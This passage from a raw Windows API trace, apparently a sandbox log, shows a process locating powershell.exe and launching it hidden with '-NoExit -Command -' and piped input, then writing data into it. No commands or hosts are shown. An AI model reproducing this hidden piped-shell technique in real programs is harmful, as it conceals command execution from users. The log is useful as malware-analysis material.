nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.204] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.204] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.205] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.205] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.205] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0236.205] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb974 | out: lpFileInformation=0x110bb974*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0236.205] CreatePipe (in: hReadPipe=0x110bbcfc, hWritePipe=0x110bbd00, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbcfc*=0x190, hWritePipe=0x110bbd00*=0x188) returned 1 [0236.205] VirtualAlloc (lpAddress=0x11136000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11136000 [0236.206] CreatePipe (in: hReadPipe=0x110bbd00, hWritePipe=0x110bbd04, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbd00*=0x1a8, hWritePipe=0x110bbd04*=0x184) returned 1 [0236.206] CreatePipe (in: hReadPipe=0x110bbd00, hWritePipe=0x110bbd04, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbd00*=0x1e0, hWritePipe=0x110bbd04*=0x1e4) returned 1 [0236.206] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x11128270, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.206] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb8ac | out: lpFileInformation=0x110bb8ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0236.206] GetEnvironmentStringsW () returned 0xa03720* [0236.206] VirtualAlloc (lpAddress=0x11138000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11138000 [0236.207] VirtualAlloc (lpAddress=0x1113a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1113a000 [0236.207] VirtualAlloc (lpAddress=0x1113c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1113c000 [0236.207] VirtualAlloc (lpAddress=0x0, dwSize=0xafc7c, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0236.208] VirtualAlloc (lpAddress=0x1113e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1113e000 [0236.208] FreeEnvironmentStringsW (penv=0xa03720) returned 1 [0236.208] VirtualAlloc (lpAddress=0x11140000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11140000 [0236.208] VirtualAlloc (lpAddress=0x11142000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11142000 [0236.209] GetCurrentProcess () returned 0xffffffff [0236.209] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x190, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11100520, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11100520*=0x1e8) returned 1 [0236.209] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11100524, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11100524*=0x1ec) returned 1 [0236.209] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11100528, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11100528*=0x1f0) returned 1 [0236.209] VirtualAlloc (lpAddress=0x11144000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x11144000 [0236.209] VirtualAlloc (lpAddress=0x11148000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x11148000 [0236.209] VirtualAlloc (lpAddress=0x1114e000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x1114e000 [0236.210] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1114e000, lpCurrentDirectory=0x0, lpStartupInfo=0x110bbbb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1e8, hStdOutput=0x1ec, hStdError=0x1f0), lpProcessInformation=0x110bbb34 | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0x110bbb34*(hProcess=0x1f8, hThread=0x1f4, dwProcessId=0x13b8, dwThreadId=0x13bc)) returned 1 [0236.222] CloseHandle (hObject=0x1f4) returned 1 [0236.222] CloseHandle (hObject=0x1f0) returned 1 [0236.222] CloseHandle (hObject=0x1ec) returned 1 [0236.222] CloseHandle (hObject=0x1e8) returned 1 [0236.222] CancelIoEx (hFile=0x190, lpOverlapped=0x0) returned 0 [0236.222] CloseHandle (hObject=0x190) returned 1 [0236.222] CancelIoEx (hFile=0x184, lpOverlapped=0x0) returned 0 [0236.222] CloseHandle (hObject=0x184) returned 1 [0236.222] CancelIoEx (hFile=0x1e4, lpOverlapped=0x0) returned 0 [0236.222] CloseHandle (hObject=0x1e4) returned 1 [0236.222] VirtualAlloc (lpAddress=0x11154000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x11154000 [0236.223] VirtualAlloc (lpAddress=0x1115a000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x1115a000 [0236.223] CryptGenRandom (in: hProv=0xa01080, dwLen=0xc, pbBuffer=0x11100540 | out: pbBuffer=0x11100540) returned 1 [0236.223] CryptGenRandom (in: hProv=0xa01080, dwLen=0xc, pbBuffer=0x11100550 | out: pbBuffer=0x11100550) returned 1 [0236.224] WriteFile (in: hFile=0x188, lpBuffer=0x11157600*, nNumberOfBytesToWrite=0xd13, lpNumberOfBytesWritten=0x110bbcf8, lpOverlapped=0x0 | out: lpBuffer=0x11157600*, lpNumberOfBytesWritten=0x110bbcf8*=0xd13, lpOverlapped=0x0) returned 1 [0236.224] ReadFile (in: hFile=0x1e0, lpBuffer=0x11105940, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x11105940*, lpNumberOfBytesRead=0x11072edc*=0x40, lpOverlapped=0x0) returned 1 [0249.582] SetEvent (hEvent=0x174) returned 1 [0249.582] ReadFile (in: hFile=0x1e0, lpBuffer=0x110863c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x110863c0*, lpNumberOfBytesRead=0x11072edc*=0x8, lpOverlapped=0x0) returned 1 [0249.582] ReadFile (in: hFile=0x1e0, lpBuffer=0x11086400, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x11086400*, lpNumberOfBytesRead=0x11072edc*=0x30, lpOverlapped=0x0) returned 1 [0256.205] SetEvent (hEvent=0x174) returned 1 [0256.206] ReadFile (in: hFile=0x1e0, lpBuffer=0x11086440, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x11086440*, lpNumberOfBytesRead=0x11072edc*=0x2, lpOverlapped=0x0) returned 1 [0295.064] ReadFile (in: hFile=0x1e0, lpBuffer=0x11086b00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x11086b00*, lpNumberOfBytesRead=0x11072edc*=0x2, lpOverlapped=0x0) returned 1 [0311.428] ReadFile (hFile=0x1e0, lpBuffer=0x11086ec0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0) Thread: id = 2 os_tid = 0x13f0 Thread: id = 3 os_tid = 0xeb4 [0090.072] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x10e0ff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x10e0ff28*=0x130) returned 1 [0090.072] VirtualQuery (in: lpAddress=0x10e0ff38, lpBuffer=0x10e0ff38, dwLength=0x1c | out: lpBuffer=0x10e0ff38*(BaseAddress=0x10e0f000, AllocationBase=0x10d10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.072] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0090.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0090.144] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0090.165] SetEvent (hEvent=0x150) returned 1 [0090.165] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0090.737] timeEndPeriod (uPeriod=0x1) returned 0x0 [0090.737] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x174 [0090.738] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x178 [0090.738] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0091.098] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0091.098] SetEvent (hEvent=0x144) returned 1 [0091.098] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0091.135] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0091.179] SetEvent (hEvent=0x138) returned 1 [0091.179] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0091.182] timeEndPeriod (uPeriod=0x1) returned 0x0 [0091.183] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0091.295] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0091.295] SetEvent (hEvent=0x138) returned 1 [0091.296] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0091.311] SetEvent (hEvent=0x138) returned 1 [0091.311] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0091.317] timeEndPeriod (uPeriod=0x1) returned 0x0 [0091.317] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0092.138] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0092.138] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0092.138] SetEvent (hEvent=0x138) returned 1 [0092.139] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0092.187] timeEndPeriod (uPeriod=0x1) returned 0x0 [0092.187] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xe9e5) returned 0x0 [0099.109] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0099.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x1102a780, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0099.111] CloseHandle (hObject=0x180) returned 1 [0099.111] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0100.918] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0101.021] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0101.066] timeEndPeriod (uPeriod=0x1) returned 0x0 [0101.066] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0161.112] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0161.143] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0161.144] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0161.146] timeEndPeriod (uPeriod=0x1) returned 0x0 [0161.147] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0198.965] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0198.965] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0198.966] SetEvent (hEvent=0x138) returned 1 [0198.966] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0199.035] timeEndPeriod (uPeriod=0x1) returned 0x0 [0199.035] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0217.856] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0217.856] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0217.857] SetEvent (hEvent=0x138) returned 1 [0217.857] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0217.899] timeEndPeriod (uPeriod=0x1) returned 0x0 [0217.899] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0226.692] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0226.692] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0226.692] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0226.693] timeEndPeriod (uPeriod=0x1) returned 0x0 [0226.693] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0227.288] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0227.289] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0227.289] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0227.292] timeEndPeriod (uPeriod=0x1) returned 0x0 [0227.292] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0236.185] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0236.185] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0236.186] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0236.187] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0x1) returned 0x102 [0236.188] SetEvent (hEvent=0x144) returned 1 [0236.188] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0236.224] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0236.224] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0236.259] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0236.259] SetEvent (hEvent=0x138) returned 1 [0236.259] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0236.267] timeEndPeriod (uPeriod=0x1) returned 0x0 [0236.268] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0249.629] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0249.629] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0249.629] SetEvent (hEvent=0x138) returned 1 [0249.629] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0249.663] timeEndPeriod (uPeriod=0x1) returned 0x0 [0249.664] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0256.207] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.207] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0256.208] SetEvent (hEvent=0x138) returned 1 [0256.208] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0256.209] timeEndPeriod (uPeriod=0x1) returned 0x0 [0256.209] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0256.736] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.737] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0256.737] SetEvent (hEvent=0x138) returned 1 [0256.737] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0256.739] timeEndPeriod (uPeriod=0x1) returned 0x0 [0256.739] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0256.771] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0256.772] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0256.772] SetEvent (hEvent=0x138) returned 1 [0256.772] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0256.783] timeEndPeriod (uPeriod=0x1) returned 0x0 [0256.783] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0257.119] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0257.119] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0257.119] SetEvent (hEvent=0x138) returned 1 [0257.119] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0257.125] timeEndPeriod (uPeriod=0x1) returned 0x0 [0257.125] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0257.311] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0257.312] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0257.312] SetEvent (hEvent=0x138) returned 1 [0257.312] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0257.317] timeEndPeriod (uPeriod=0x1) returned 0x0 [0257.317] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0275.014] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0275.015] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0275.015] SetEvent (hEvent=0x138) returned 1 [0275.015] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0275.026] timeEndPeriod (uPeriod=0x1) returned 0x0 [0275.027] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0277.171] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0277.171] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, 